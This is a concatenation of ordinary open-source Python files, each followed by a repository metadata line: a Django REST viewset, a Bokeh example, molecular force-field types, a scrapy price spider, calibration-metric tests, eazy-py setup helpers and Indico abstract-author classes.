    This viewset automatically provides `list`, `create`, `retrieve`,
    `update` and `destroy` actions, plus an extra read-only `highlight`
    action that renders the snippet as static HTML.
    """

    queryset = Snippet.objects.all()
    serializer_class = SnippetSerializer
    permission_classes = (
        permissions.IsAuthenticatedOrReadOnly,
        IsOwnerOrReadOnly,
    )

    def pre_save(self, obj):
        # Stamp the authenticated user as owner before saving.
        obj.owner = self.request.user

    # `@link` routes an extra GET endpoint (`@action` would route POST).
    @link(renderer_classes=[renderers.StaticHTMLRenderer])
    def highlight(self, request, *args, **kwargs):
        # Return the pre-rendered HTML stored on the instance, not JSON.
        snippet = self.get_object()
        return Response(snippet.highlighted)
#--------------------------------------------------------------------------------------------------
| nimiq/test-django-rest | snippets/views.py | Python | apache-2.0 | 7,781 |
## Bokeh server for button click
from bokeh.io import curdoc
from bokeh.layouts import row
from bokeh.models import Button, ColumnDataSource
from bokeh.plotting import figure

# Static scatter data, served through a ColumnDataSource.
xs = [3, 4, 6, 12, 10, 1]
ys = [7, 1, 3, 4, 1, 6]
source = ColumnDataSource(data=dict(x=xs, y=ys))

plot_figure = figure(
    height=450,
    width=600,
    tools="save,reset",
    x_range=[0, 14],
    y_range=[0, 12],
    toolbar_location="below",
)
plot_figure.scatter('x', 'y', source=source, size=10)

button = Button(label="Click to set plot title", button_type="success")

def button_click():
    # Callback: retitle the plot when the button fires.
    plot_figure.title.text = 'Button Clicked'

button.on_event('button_click', button_click)

layout = row(button, plot_figure)
curdoc().add_root(layout)
curdoc().title = "Button Bokeh Server"
| bokeh/bokeh | examples/reference/models/button_server.py | Python | bsd-3-clause | 750 |
import parmed.unit as units
from intermol.decorators import accepts_compatible_units
from intermol.forces.abstract_nonbonded_type import AbstractNonbondedType
class LjCNonbondedType(AbstractNonbondedType):
    # Nonbonded pair type parameterized by C6 and C12 coefficients, carried
    # with explicit units (kJ/mol*nm^6 and kJ/mol*nm^12, per the defaults
    # below).
    __slots__ = ['C6', 'C12', 'type']

    # The decorator validates that incoming quantities are dimensionally
    # compatible with the declared units; `None` entries are not unit-checked.
    @accepts_compatible_units(None, None,
                              C6=units.kilojoules_per_mole * units.nanometers ** (6),
                              C12=units.kilojoules_per_mole * units.nanometers ** (12),
                              type=None)
    def __init__(self, bondingtype1, bondingtype2,
                 C6=0.0 * units.kilojoules_per_mole * units.nanometers ** (6),
                 C12=0.0 * units.kilojoules_per_mole * units.nanometers ** (12),
                 type=False):
        AbstractNonbondedType.__init__(self, bondingtype1, bondingtype2, type)
        self.C6 = C6
        self.C12 = C12
class LjCNonbonded(LjCNonbondedType):
    """A C6/C12 nonbonded interaction bound to a concrete pair of atoms.

    stub documentation
    """
    def __init__(self, atom1, atom2, bondingtype1=None, bondingtype2=None,
                 C6=0.0 * units.kilojoules_per_mole * units.nanometers ** (6),
                 C12=0.0 * units.kilojoules_per_mole * units.nanometers ** (12),
                 type=False):
        # Delegate parameter/unit handling to the type class, and record the
        # atom pair this interaction applies to.
        self.atom1 = atom1
        self.atom2 = atom2
        LjCNonbondedType.__init__(
            self, bondingtype1, bondingtype2, C6=C6, C12=C12, type=type)
import csv
import os
import copy
import re
from decimal import Decimal
from scrapy.spider import BaseSpider
from scrapy.selector import HtmlXPathSelector
from scrapy.http import Request, HtmlResponse, FormRequest
from scrapy.utils.response import get_base_url
from scrapy.utils.url import urljoin_rfc
from scrapy.http.cookies import CookieJar
from product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader
HERE = os.path.abspath(os.path.dirname(__file__))
class AmazonSpider(BaseSpider):
    """Price-watch spider for svh24.de (Bosch professional tools).

    Reads (sku, url) pairs from bosch_german_professional.csv and scrapes
    the product name and price from each product page.
    """
    name = 'bosch-german-professional-svh24.de'
    allowed_domains = ['svh24.de']
    user_agent = 'spd'

    def start_requests(self):
        # One request per CSV row that has a svh24 URL; the sku is carried
        # through request meta so it can be attached to the scraped item.
        with open(os.path.join(HERE, 'bosch_german_professional.csv')) as f:
            reader = csv.DictReader(f)
            for row in reader:
                url = row['svh24']
                if url:
                    yield Request(url, meta={'sku': row['sku']}, callback=self.parse_product)

    def parse(self, response):
        # All parsing happens in parse_product; nothing to do here.
        pass

    @staticmethod
    def _clean_price(raw):
        """Normalise a German-formatted price ('1.234,56') to '1234.56'.

        Fixed: the previous code only swapped the decimal comma for a dot,
        which corrupted prices >= 1000 ('1.234,56' became '1.234.56').
        Thousands dots are stripped before the comma is converted.
        """
        return raw.strip().replace('.', '').replace(',', '.')

    def parse_product(self, response):
        """Extract name, price (itemprop markup) and the sku from meta."""
        hxs = HtmlXPathSelector(response)
        loader = ProductLoader(item=Product(), selector=hxs)
        loader.add_value('url', response.url)
        loader.add_xpath('name', u'//h1[@itemprop="name"]/text()')
        price = self._clean_price(
            hxs.select(u'//span[@itemprop="price"]/text()').extract()[0])
        loader.add_value('price', price)
        loader.add_value('sku', response.meta['sku'])
        yield loader.load_item()
| 0--key/lib | portfolio/Python/scrapy/bosch_german_professional/svh24.py | Python | apache-2.0 | 1,479 |
def plus(num):
    """Return num incremented by one."""
    return 1 + num
def mult(num):
    """Return num doubled.

    Fixed: the body returned ``mult * 2`` — the function object times two —
    which raised TypeError on every call; it now doubles the argument.
    """
    return num * 2
# Functions are first-class objects: store them in a list and call by index.
lst = [plus, mult]
print (lst[0](3))  # calls plus(3)
| BogdanShevchenko/PythonGames | deijkstra.py | Python | gpl-2.0 | 109 |
import os
from . import igm
from . import param
from . import templates
from . import filters
from . import photoz
from .version import __version__, __long_version__, __version_hash__
def symlink_eazy_inputs(path='$EAZYCODE', get_hdfn_test_catalog=False, copy=False):
    """
    Make symbolic links to EAZY inputs

    Parameters
    ----------
    path : str or None
        Full directory path or environment variable pointing to the old eazy
        C-code repository that provides the template and filter files.

        If `path.startswith('$')` then treat path as an environment variable.

        If `path` is None (or names an unset environment variable), fall back
        to the `data/` directory shipped with this package.

    get_hdfn_test_catalog : bool
        Also link the HDF-N test catalog and `zphot.translate` file if they
        can be found under `path`.

    copy : bool
        Copy the ``templates`` directory and ``FILTER.RES.latest`` file
        (via ``cp``), rather than symlinking them.

    Returns
    -------
    ``False`` when `path` does not exist; otherwise ``None``, with the
    links/copies created in the current working directory (`./`).
    """
    # Fixed: `path=None` is documented as valid, but `None.startswith`
    # raised AttributeError; guard before dereferencing.
    if path is not None and path.startswith('$'):
        path = os.getenv(path)

    if path is None:
        # Use the data files attached to this package.
        path = os.path.join(os.path.dirname(__file__), 'data/')

    if not os.path.exists(path):
        print('Couldn\'t find path {0}'.format(path))
        return False

    # Templates directory: remove any stale link/dir first.
    if os.path.exists('./templates'):
        try:
            os.remove('./templates')
        except PermissionError:
            # A real directory (not a symlink) can't be os.remove()d.
            os.system('rm -rf templates')

    t_path = os.path.join(path, 'templates')
    if copy:
        os.system('cp -R {0} .'.format(t_path))
    else:
        os.symlink(t_path, './templates')

    print('{0} -> {1}'.format(t_path, './templates'))

    # Filter file.
    if os.path.exists('./FILTER.RES.latest'):
        os.remove('./FILTER.RES.latest')

    res_path = os.path.join(path, 'filters/FILTER.RES.latest')
    if copy:
        # Fixed: this was os.system(f'cp {0} .'.format(res_path)) — the
        # f-string evaluated '{0}' immediately, so the literal command
        # executed was 'cp 0 .' and the filter file was never copied.
        os.system('cp {0} .'.format(res_path))
    else:
        os.symlink(res_path, './FILTER.RES.latest')

    print('{0} -> {1}'.format(res_path, './FILTER.RES.latest'))

    if get_hdfn_test_catalog:
        # The catalog moved between repository versions; try both locations.
        for cat_path in ['inputs', 'hdfn_fs99']:
            parent = os.path.join(path, cat_path, 'hdfn_fs99_eazy.cat')
            translate = os.path.join(path, cat_path, 'zphot.translate')
            if os.path.exists(parent):
                for file in [parent, translate]:
                    os.symlink(file, os.path.basename(file))
                    print('{0} -> {1}'.format(file, os.path.basename(file)))
def get_test_catalog(path=None, path_is_env=True):
    """
    Make symbolic links to EAZY inputs

    Parameters
    ----------
    path : str
        Full directory path or environment variable pointing to the old eazy
        C-code repository that provides the template and filter files.

    path_is_env : bool
        If True, then `path` is an environment variable pointing to the Eazy
        repository.  If False, then treat as a directory path.

    Returns
    -------
    Symbolic links in `./`.
    """
    if path_is_env:
        # NOTE(review): os.getenv returns None for an unset variable, and
        # os.path.exists(None) below would then raise TypeError — confirm
        # callers always pass a set environment variable here.
        path = os.getenv(path)

    if not os.path.exists(path):
        print('Couldn\'t find path {0}'.format(path))
        return False
    # NOTE(review): no link-creation code follows the validation above even
    # though the docstring promises symlinks — possibly truncated/unfinished.
| gbrammer/eazy-py | eazy/__init__.py | Python | mit | 3,736 |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for metrics_lib."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v2 as tf
import tensorflow_probability as tfp
from uq_benchmark_2019 import metrics_lib
class MetricsLibTest(tf.test.TestCase, parameterized.TestCase):
  """Tests for metrics_lib: calibration binning, ECE variants (binary,
  multiclass, equal-width and quantile bins), top-k accuracy, and Brier
  scores/decompositions."""

  def test_bin_predictions_and_accuracies(self):
    # With labels drawn as Bernoulli(p), per-bin accuracy should track the
    # bin centers of mass and counts should be ~uniform across bins.
    num_samples = int(1e5)
    num_bins = 7
    probabilities = np.linspace(0, 1, num_samples)
    labels = np.random.random(num_samples) < probabilities

    bin_edges, accuracies, counts = metrics_lib.bin_predictions_and_accuracies(
        probabilities, labels, num_bins)
    bin_centers = metrics_lib.bin_centers_of_mass(probabilities, bin_edges)
    self.assertTrue((bin_centers > bin_edges[:-1]).all())
    self.assertTrue((bin_centers < bin_edges[1:]).all())
    self.assertAllClose(accuracies, bin_centers, atol=0.05)
    self.assertAllClose(np.ones(num_bins), num_bins * counts / num_samples,
                        atol=0.05)

  #
  # expected_calibration_error
  #

  def test_expected_calibration_error(self):
    # A calibrated predictor must score a lower ECE than a systematically
    # under-confident one (probs / 2), for both bin styles.
    np.random.seed(1)
    nsamples = 100
    probs = np.linspace(0, 1, nsamples)
    labels = np.random.rand(nsamples) < probs
    ece = metrics_lib.expected_calibration_error(probs, labels)
    bad_ece = metrics_lib.expected_calibration_error(probs / 2, labels)

    self.assertBetween(ece, 0, 1)
    self.assertBetween(bad_ece, 0, 1)
    self.assertLess(ece, bad_ece)

    bins = metrics_lib.get_quantile_bins(10, probs)
    quantile_ece = metrics_lib.expected_calibration_error(probs, labels, bins)
    bad_quantile_ece = metrics_lib.expected_calibration_error(
        probs / 2, labels, bins)

    self.assertBetween(quantile_ece, 0, 1)
    self.assertBetween(bad_quantile_ece, 0, 1)
    self.assertLess(quantile_ece, bad_quantile_ece)

  def test_expected_calibration_error_all_wrong(self):
    # Fully confident and always wrong -> maximal ECE of 1.
    num_bins = 90
    ece = metrics_lib.expected_calibration_error(
        np.zeros(10), np.ones(10), bins=num_bins)
    self.assertAlmostEqual(ece, 1.)

    ece = metrics_lib.expected_calibration_error(
        np.ones(10), np.zeros(10), bins=num_bins)
    self.assertAlmostEqual(ece, 1.)

  def test_expected_calibration_error_all_right(self):
    # Fully confident and always right -> ECE of 0.
    num_bins = 90
    ece = metrics_lib.expected_calibration_error(
        np.ones(10), np.ones(10), bins=num_bins)
    self.assertAlmostEqual(ece, 0.)

    ece = metrics_lib.expected_calibration_error(
        np.zeros(10), np.zeros(10), bins=num_bins)
    self.assertAlmostEqual(ece, 0.)

  def test_expected_calibration_error_bad_input(self):
    # Invalid probability/label combinations must raise ValueError.
    with self.assertRaises(ValueError):
      metrics_lib.expected_calibration_error(np.ones(1), np.ones(1))
    with self.assertRaises(ValueError):
      metrics_lib.expected_calibration_error(np.ones(100), np.ones(1))
    with self.assertRaises(ValueError):
      metrics_lib.expected_calibration_error(np.ones(100), np.ones(100) * 0.5)

  #
  # Tests for multiclass functions.
  #

  def test_get_multiclass_predictions_and_correctness(self):
    multiclass_probs = np.array([[0.1, 0.2, 0.7], [0.5, 0.3, 0.2],
                                 [0.7, 0.2, 0.1], [0.3, 0.5, 0.2]])
    labels = np.array([2, 0, 1, 0])
    (argmax_probs,
     is_correct) = metrics_lib.get_multiclass_predictions_and_correctness(
         multiclass_probs, labels)
    self.assertAllEqual(argmax_probs, [0.7, 0.5, 0.7, 0.5])
    self.assertAllEqual(is_correct, [True, True, False, False])

  def test_get_multiclass_predictions_and_correctness_error_cases(self):
    multiclass_probs = np.array([[0.1, 0.2, 0.7], [0.5, 0.3, 0.2],
                                 [0.7, 0.2, 0.1], [0.3, 0.5, 0.2]])
    labels = np.array([2, 0, 1, 0])

    with self.assertRaises(ValueError):
      # Rows no longer sum to 1.
      bad_multiclass_probs = multiclass_probs - 0.01
      metrics_lib.get_multiclass_predictions_and_correctness(
          bad_multiclass_probs, labels)
    with self.assertRaises(ValueError):
      # Probabilities with a trailing extra dimension.
      metrics_lib.get_multiclass_predictions_and_correctness(
          bad_multiclass_probs[Ellipsis, None], labels)
    with self.assertRaises(ValueError):
      # Labels with a trailing extra dimension.
      metrics_lib.get_multiclass_predictions_and_correctness(
          bad_multiclass_probs, labels[Ellipsis, None])

  def test_expected_calibration_error_multiclass(self):
    num_samples = int(1e4)
    num_classes = 5
    probabilities, labels = _make_perfectly_calibrated_multiclass(
        num_samples, num_classes)

    good_ece = metrics_lib.expected_calibration_error_multiclass(
        probabilities, labels)
    # np.fliplr moves the calibrated mass away from the argmax class.
    bad_ece = metrics_lib.expected_calibration_error_multiclass(
        np.fliplr(probabilities), labels)
    self.assertAllClose(good_ece, 0, atol=0.05)
    self.assertAllClose(bad_ece, 0.5, atol=0.05)

    good_ece_topk = metrics_lib.expected_calibration_error_multiclass(
        probabilities, labels, top_k=3)
    self.assertAllClose(good_ece_topk, 0, atol=0.05)

  @parameterized.parameters(1, 2, None)
  def test_expected_calibration_error_quantile_multiclass(self, top_k):
    # Expected mis-calibration of the flipped predictor for each top_k.
    bad_quantile_eces = {1: .5, 2: .25, None: .2}
    num_samples = int(1e4)
    num_classes = 5
    probabilities, labels = _make_perfectly_calibrated_multiclass(
        num_samples, num_classes)

    bins = metrics_lib.get_quantile_bins(10, probabilities, top_k=top_k)
    good_quantile_ece = metrics_lib.expected_calibration_error_multiclass(
        probabilities, labels, bins, top_k)
    bad_quantile_ece = metrics_lib.expected_calibration_error_multiclass(
        np.fliplr(probabilities), labels, bins, top_k)
    self.assertAllClose(good_quantile_ece, 0, atol=0.05)
    self.assertAllClose(bad_quantile_ece, bad_quantile_eces[top_k], atol=0.05)

  def test_accuracy_top_k(self):
    # Each row is sorted ascending, so the true class k lands in the top-m
    # iff k >= num_classes - m; with labels 0..9 (twice), top-m accuracy
    # is exactly m / 10.
    num_samples = 20
    num_classes = 10
    probs = np.random.rand(num_samples, num_classes)
    probs /= np.expand_dims(probs.sum(axis=1), axis=-1)
    probs = np.apply_along_axis(sorted, 1, probs)
    labels = np.tile(np.arange(num_classes), 2)

    top_2_accuracy = metrics_lib.accuracy_top_k(probs, labels, 2)
    top_5_accuracy = metrics_lib.accuracy_top_k(probs, labels, 5)
    self.assertEqual(top_2_accuracy, .2)
    self.assertEqual(top_5_accuracy, .5)

  #
  # Tests for Brier score, decomposition
  #

  def test_brier_scores(self):
    batch_shape = (2, 3)
    num_samples, num_classes = 99, 9
    logits = tf.random.uniform(batch_shape + (num_samples, num_classes))
    dist = tfp.distributions.Categorical(logits=logits)
    labels = dist.sample().numpy()
    probs = dist.probs_parameter().numpy()
    scores = metrics_lib.brier_scores(labels, probs=probs)
    # Check that computing from logits returns the same result.
    self.assertAllClose(scores, metrics_lib.brier_scores(labels, logits=logits))
    self.assertEqual(scores.shape, batch_shape + (num_samples,))

    def compute_brier(labels_, logits_):
      # Reference implementation: mean of sum_i p_i^2 - 2 * p_label.
      probs_ = tf.math.softmax(logits_, axis=1)
      _, nlabels = probs_.shape
      plabel = tf.reduce_sum(tf.one_hot(labels_, nlabels) * probs_, axis=1)
      brier = tf.reduce_sum(tf.square(probs_), axis=1) - 2.0 * plabel
      return tf.reduce_mean(brier)

    scores_avg = scores.mean(-1)
    for indices in np.ndindex(*batch_shape):
      score_i = compute_brier(labels[indices], logits[indices])
      self.assertAlmostEqual(score_i.numpy(), scores_avg[indices])

  def test_brier_decompositions(self):
    batch_shape = (2, 3)
    num_samples, num_classes = 99, 9
    logits = tf.random.uniform(batch_shape + (num_samples, num_classes))
    dist = tfp.distributions.Categorical(logits=logits)
    labels = dist.sample().numpy()
    probs = dist.probs_parameter().numpy()

    all_decomps = metrics_lib.brier_decompositions(labels, probs)
    self.assertEqual(all_decomps.shape, batch_shape + (3,))

    # The batched result must match the per-distribution decomposition.
    for indices in np.ndindex(*batch_shape):
      decomp_i = metrics_lib.brier_decomposition(labels[indices],
                                                 logits[indices])
      decomp_i = tf.stack(decomp_i, axis=-1).numpy()
      self.assertAllClose(decomp_i, all_decomps[indices])
def _make_perfectly_calibrated_multiclass(num_samples, num_classes):
argmax_probabilities = np.linspace(1/num_classes, 1, num_samples)
# Probs have uniform probability among non-selected class.
probabilities = (1 - argmax_probabilities) / (num_classes - 1)
probabilities = np.tile(probabilities[:, None], [1, num_classes])
probabilities[:, 0] = argmax_probabilities
labels = np.stack([np.random.choice(num_classes, p=p) for p in probabilities])
return probabilities, labels
# Running this module directly executes the test suite under TF2 semantics.
if __name__ == '__main__':
  tf.enable_v2_behavior()
  tf.test.main()
| google-research/google-research | uq_benchmark_2019/metrics_lib_test.py | Python | apache-2.0 | 9,261 |
# This file is part of Indico.
# Copyright (C) 2002 - 2015 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from copy import copy
from pytz import timezone
from indico.util.string import safe_upper, safe_slice
from indico.util.i18n import i18nformat
from persistent import Persistent
from persistent.list import PersistentList
from BTrees.OOBTree import OOBTree, intersection, union
from BTrees.IOBTree import IOBTree
import BTrees.OIBTree as OIBTree
from datetime import datetime
from MaKaC.common.Counter import Counter
from MaKaC.errors import MaKaCError, NoReportError
from MaKaC.trashCan import TrashCanManager
from MaKaC.common.timezoneUtils import nowutc
from MaKaC.i18n import _
from indico.core.config import Config
from MaKaC.common.fossilize import fossilizes, Fossilizable
from MaKaC.fossils.abstracts import IAbstractFieldFossil
from MaKaC.fossils.abstracts import IAbstractTextFieldFossil
from MaKaC.fossils.abstracts import IAbstractSelectionFieldFossil
from MaKaC.fossils.abstracts import ISelectionFieldOptionFossil
from indico.util.i18n import N_
from indico.util.text import wordsCounter
import tempfile
class _AbstractParticipationIndex(Persistent):
    """This class allows to index abstract participations (submitters)
    for a single CFA process; this means that clients will be able to
    efficiently perform queries of the type "give me all the abstracts
    in which a certain registered user is implied".
       For being able to perform this indexing, it is supposed that the Avatar
    identifier is unique among other avatars and that it cannot change.
       This index must be maintained by clients (i.e. the CFAMgr) as it doesn't
    keep track of the changes on Participantons.
       The key of the index is the Avatar and the values the different
    Participations that user has within the current CFA process. For
    performance reasons, the Avatar id will be used as index key (using the
    whole Avatar object would make the index bigger and as the Avatar id
    cannot change it's enough); the clients would have to keep the
    integrity of the index.
    """

    def __init__(self):
        # Maps Avatar id (str) -> PersistentList of AbstractParticipation.
        self._idx = OOBTree()

    def index(self, participation):
        """Add a new participation to the index
        """
        #if the Participation is not linked to an Avatar there's no point to
        #   index it
        a = participation.getAvatar()
        if not a:
            return
        #ToDo: if the Participation corresponds to an abstract which doesn't
        #   correspond to the current CFAMgr, then an error must be raised
        if not self._idx.has_key(a.getId()):
            self._idx[a.getId()] = PersistentList()
        #if the participation is already in the index, no need for adding it
        if participation in self._idx[a.getId()]:
            return
        self._idx[a.getId()].append(participation)

    def unindex(self, participation):
        """Remove an existing participation from the index
        """
        #if the Participation is not linked to an Avatar there's no point to
        #   unindex it
        a = participation.getAvatar()
        if not a:
            return
        #if the Avatar associated to the participation isn't in the index do
        #   nothing
        if not self._idx.has_key(a.getId()):
            return
        #if the given participation is indexed remove it, otherwise do nothing
        if participation in self._idx[a.getId()]:
            self._idx[a.getId()].remove(participation)

    def getParticipationList(self, av):
        # Return the participations indexed for `av`; empty list when the
        # avatar was never indexed.
        try:
            return self._idx[av.getId()]
        except KeyError, e:
            return []
class AbstractParticipation(Persistent):
    """A person (author or submitter) attached to an abstract.

    Holds plain contact data (name, e-mail, affiliation, ...).  Changes to
    first name, surname and e-mail are propagated to the owning CFA
    manager's author indexes via _index()/_unindex().
    """

    def __init__(self, abstract, **data):
        self._abstract = abstract
        self._firstName = ""
        self._surName = ""
        self._email = ""
        # NOTE: historical misspelling of the attribute is kept for
        # compatibility with persisted objects.
        self._affilliation = ""
        self._address = ""
        self._telephone = ""
        self._fax = ""
        self._title = ""
        self.setData(**data)

    def setFromAvatar(self, av):
        """Copy all contact fields from a registered user (Avatar)."""
        data = {"title": av.getTitle(),
                "firstName": av.getName(),
                "surName": av.getSurName(),
                "email": av.getEmail(),
                "affiliation": av.getOrganisation(),
                "address": av.getAddress(),
                "telephone": av.getTelephone(),
                "fax": av.getFax()}
        self.setData(**data)

    def setFromAbstractParticipation(self, part):
        """Copy all contact fields from another AbstractParticipation."""
        data = {"title": part.getTitle(),
                "firstName": part.getFirstName(),
                "surName": part.getSurName(),
                "email": part.getEmail(),
                "affiliation": part.getAffiliation(),
                "address": part.getAddress(),
                "telephone": part.getTelephone(),
                "fax": part.getFax()}
        self.setData(**data)

    def setData(self, **data):
        """Update any subset of the contact fields from keyword arguments."""
        if "firstName" in data:
            self.setFirstName(data["firstName"])
        if "surName" in data:
            self.setSurName(data["surName"])
        if "email" in data:
            self.setEmail(data["email"])
        if "affiliation" in data:
            self.setAffiliation(data["affiliation"])
        if "address" in data:
            self.setAddress(data["address"])
        if "telephone" in data:
            self.setTelephone(data["telephone"])
        if "fax" in data:
            self.setFax(data["fax"])
        if "title" in data:
            self.setTitle(data["title"])
    setValues = setData  # legacy alias

    def getData(self):
        """Return all contact fields as a plain dict (keys match setData)."""
        data = {}
        data["firstName"] = self.getFirstName()
        data["surName"] = self.getSurName()
        data["email"] = self.getEmail()
        data["affiliation"] = self.getAffiliation()
        data["address"] = self.getAddress()
        data["telephone"] = self.getTelephone()
        data["fax"] = self.getFax()
        data["title"] = self.getTitle()
        return data
    getValues = getData  # legacy alias

    def clone(self, abstract):
        """Return a copy of this participation bound to `abstract`.

        Fixed: __init__ only accepts the contact data as keyword arguments
        (**data), so the dict returned by getData() must be expanded with
        ``**`` — passing it positionally raised TypeError on every call.
        """
        ap = AbstractParticipation(abstract, **self.getData())
        return ap

    def _notifyModification(self):
        self._abstract._notifyModification()

    def _unindex(self):
        # Remove this participation from the CFA manager's author index
        # (no-op when the abstract is detached or has no owner).
        abs = self.getAbstract()
        if abs is not None:
            mgr = abs.getOwner()
            if mgr is not None:
                mgr.unindexAuthor(self)

    def _index(self):
        # Re-register this participation in the CFA manager's author index.
        abs = self.getAbstract()
        if abs is not None:
            mgr = abs.getOwner()
            if mgr is not None:
                mgr.indexAuthor(self)

    def setFirstName(self, name):
        # Reindex only when the (stripped) value actually changes.
        tmp = name.strip()
        if tmp == self.getFirstName():
            return
        self._unindex()
        self._firstName = tmp
        self._index()
        self._notifyModification()

    def getFirstName(self):
        return self._firstName

    def getName(self):
        return self._firstName

    def setSurName(self, name):
        tmp = name.strip()
        if tmp == self.getSurName():
            return
        self._unindex()
        self._surName = tmp
        self._index()
        self._notifyModification()

    def getSurName(self):
        return self._surName

    def getFamilyName(self):
        return self._surName

    def setEmail(self, email):
        # E-mails are stored lower-cased; reindex only on change.
        email = email.strip().lower()
        if email != self.getEmail():
            self._unindex()
            self._email = email
            self._index()
            self._notifyModification()

    def getEmail(self):
        return self._email

    def setAffiliation(self, af):
        self._affilliation = af.strip()
        self._notifyModification()
    setAffilliation = setAffiliation  # legacy misspelled alias

    def getAffiliation(self):
        return self._affilliation

    def setAddress(self, address):
        self._address = address.strip()
        self._notifyModification()

    def getAddress(self):
        return self._address

    def setTelephone(self, telf):
        self._telephone = telf.strip()
        self._notifyModification()

    def getTelephone(self):
        return self._telephone

    def setFax(self, fax):
        self._fax = fax.strip()
        self._notifyModification()

    def getFax(self):
        return self._fax

    def setTitle(self, title):
        self._title = title.strip()
        self._notifyModification()

    def getTitle(self):
        return self._title

    def getFullName(self):
        """Return '[Title ]SURNAME, First Name' with each first name
        capitalised."""
        res = safe_upper(self.getSurName())
        tmp = []
        for name in self.getFirstName().lower().split(" "):
            if not name.strip():
                continue
            name = name.strip()
            tmp.append(safe_upper(safe_slice(name, 0, 1)) + safe_slice(name, 1))
        firstName = " ".join(tmp)
        if firstName:
            res = "%s, %s" % (res, firstName)
        if self.getTitle():
            res = "%s %s" % (self.getTitle(), res)
        return res

    def getStraightFullName(self):
        """Return 'First Surname' without title or capitalisation changes."""
        name = ""
        if self.getName():
            name = "%s " % self.getName()
        return "%s%s" % (name, self.getSurName())

    def getAbrName(self):
        """Return 'Surname, F.' (first-name initial only)."""
        res = self.getSurName()
        if self.getFirstName():
            if res:
                res = "%s, " % res
            res = "%s%s." % (res, safe_upper(safe_slice(self.getFirstName(), 0, 1)))
        return res

    def getAbstract(self):
        return self._abstract

    def setAbstract(self, abs):
        self._abstract = abs

    def delete(self):
        # Unindex, detach from the abstract and hand over to the trash can.
        self._unindex()
        self._abstract = None
        TrashCanManager().add(self)

    def recover(self):
        TrashCanManager().remove(self)
class Author(AbstractParticipation):
    """An abstract author; numeric ids are assigned externally via setId()."""

    def __init__(self, abstract, **data):
        AbstractParticipation.__init__(self, abstract, **data)
        self._abstractId = ""

    def getId(self):
        # NOTE(review): `_id` is only created by setId(); calling getId()
        # before setId() raises AttributeError — confirm callers always
        # assign an id first.
        return self._id

    def setId(self, newId):
        self._id = str(newId)

    def clone(self, abstract):
        """Return a copy of this author bound to `abstract`.

        Fixed: __init__ accepts the data only as keyword arguments
        (**data), so getData() must be expanded with ``**`` — passing the
        dict positionally raised TypeError.
        """
        auth = Author(abstract, **self.getData())
        return auth

    def isSpeaker(self):
        return self._abstract.isSpeaker(self)
class Submitter(AbstractParticipation):
    """The participation of the registered user that submitted an abstract.

    Always linked to an Avatar; the link is kept in the CFA manager's
    participation index via register/unregisterParticipation.
    """

    def __init__(self, abstract, av):
        if av is None:
            raise MaKaCError(_("abstract submitter cannot be None"))
        AbstractParticipation.__init__(self, abstract)
        self._user = None
        self._setUser(av)
        self.setFromAvatar(av)

    def _setUser(self, av):
        if self.getUser() == av:
            return
        #if currently there's an association with a registered user, we notify
        #   the unidexation of the participation
        if self.getUser():
            self.getAbstract().getOwner().unregisterParticipation(self)
        self._user = av
        #if the participation is associated to any avatar, we make the
        #   association and index it
        if self.getUser():
            self.getAbstract().getOwner().registerParticipation(self)

    def clone(self, abstract):
        """Return a copy of this submitter bound to `abstract`.

        Fixed: setData only accepts keyword arguments (**data), so the
        dict returned by getData() must be expanded with ``**`` — passing
        it positionally raised TypeError.
        """
        sub = Submitter(abstract, self.getAvatar())
        sub.setData(**self.getData())
        return sub

    def getUser(self):
        return self._user

    def getAvatar(self):
        return self._user

    def representsUser(self, av):
        """Tell whether this participation belongs to the given avatar."""
        return self.getUser() == av
class _AuthIdx(Persistent):
    """Per-conference author index.

    Maps a lower-cased "surname firstname" key to an OIBTree of
    abstract id (str) -> number of occurrences of that author in the
    abstract.  Subclasses may override _getKey to index by other fields.
    """

    def __init__(self, mgr):
        # `mgr` is the owning CFA manager; only its abstracts may be indexed.
        self._mgr = mgr
        self._idx = OOBTree()

    def _getKey(self, auth):
        return "%s %s" % (auth.getSurName().lower(), auth.getFirstName().lower())

    def index(self, auth):
        """Register `auth`; bumps the per-abstract occurrence counter."""
        if auth.getAbstract() is None:
            raise MaKaCError(_("cannot index an author of an abstract which is not included in a conference"))
        if auth.getAbstract().getOwner() != self._mgr:
            raise MaKaCError(_("cannot index an author of an abstract which does not belong to this conference"))
        key = self._getKey(auth)
        abstractId = str(auth.getAbstract().getId())
        if not self._idx.has_key(key):
            self._idx[key] = OIBTree.OIBTree()
        if not self._idx[key].has_key(abstractId):
            self._idx[key][abstractId] = 0
        self._idx[key][abstractId] += 1

    def unindex(self, auth):
        """Remove one occurrence of `auth`; prunes empty counters/keys."""
        if auth.getAbstract() is None:
            raise MaKaCError(_("cannot unindex an author of an abstract which is not included in a conference"))
        if auth.getAbstract().getOwner() != self._mgr:
            raise MaKaCError(_("cannot unindex an author of an abstract which does not belong to this conference"))
        key = self._getKey(auth)
        if not self._idx.has_key(key):
            return
        abstractId = str(auth.getAbstract().getId())
        if abstractId not in self._idx[key]:
            return
        self._idx[key][abstractId] -= 1
        if self._idx[key][abstractId] <= 0:
            del self._idx[key][abstractId]
        if len(self._idx[key]) <= 0:
            del self._idx[key]

    def match(self, query):
        """Return the set of abstract ids whose author key contains `query`
        as a case-insensitive substring."""
        query = query.lower().strip()
        res = OIBTree.OISet()
        for k in self._idx.keys():
            if k.find(query) != -1:
                res = OIBTree.union(res, self._idx[k])
        return res
class _PrimAuthIdx(_AuthIdx):
